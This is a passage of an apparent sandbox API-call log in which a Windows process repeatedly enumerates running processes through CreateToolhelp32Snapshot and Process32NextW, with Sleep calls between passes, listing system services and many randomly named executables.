lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0108.137] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0108.138] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0108.139] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0108.140] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.141] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0108.142] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0108.143] CloseHandle (hObject=0xbc) returned 1 [0108.143] Sleep (dwMilliseconds=0x12c) [0108.519] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0108.525] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.525] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0108.526] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0108.527] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.527] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0108.528] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.529] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0108.529] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0108.530] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0108.530] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0108.531] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.532] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.532] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.533] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.534] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.534] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0108.535] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.536] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.536] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0108.537] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.539] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0108.540] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0108.541] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0108.542] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0108.543] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.544] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0108.546] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0108.547] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0108.548] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0108.549] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0108.551] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0108.552] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0108.553] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0108.613] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0108.614] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0108.615] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0108.616] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0108.617] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0108.618] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0108.619] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0108.620] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0108.621] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0108.622] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0108.623] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0108.624] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0108.625] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0108.627] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.628] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0108.629] CloseHandle (hObject=0xc4) returned 1 [0108.629] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0108.634] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.635] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0108.635] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0108.636] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.636] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0108.637] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.638] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0108.638] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0108.639] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0108.640] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0108.640] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.641] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.642] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.642] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.643] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.644] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0108.644] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.645] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.645] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0108.647] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.664] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0108.665] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0108.666] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0108.667] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0108.669] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.670] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0108.671] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0108.672] 